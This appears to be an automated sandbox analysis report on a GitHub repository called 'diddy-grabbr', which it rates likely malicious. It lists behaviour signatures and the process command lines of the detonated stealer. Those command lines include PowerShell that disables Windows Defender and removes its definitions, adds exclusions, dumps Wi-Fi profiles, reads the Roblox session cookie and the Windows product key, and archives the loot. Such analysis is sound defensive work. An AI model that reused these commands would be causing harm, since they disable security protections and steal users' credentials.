Analysis Overview
Threat Level: Likely malicious
The file https://github.com/BANEX12/diddy-grabbr was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Enumerates processes with tasklist
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Detects videocard installed
Kills process with taskkill
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 03:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 03:01
Reported
2024-11-14 03:02
Platform
win10v2004-20241007-en
Max time kernel
33s
Max time network
38s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe | N/A |
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/BANEX12/diddy-grabbr
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffec77846f8,0x7ffec7784708,0x7ffec7784718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15353215480120177997,1563734136622774177,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe
"C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe"
C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe
"C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\diddy-grabbr-main\diddy-grabbr-main\Built.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4928"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4928
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4912"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4912
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 808"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 808
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2040"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2040
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3160"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3160
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2452"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2452
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2716"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2716
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4844"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4844
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5236"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5236
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5248"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5248
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe a -r -hp"BANE" "C:\Users\Admin\AppData\Local\Temp\YFIex.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe a -r -hp"BANE" "C:\Users\Admin\AppData\Local\Temp\YFIex.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
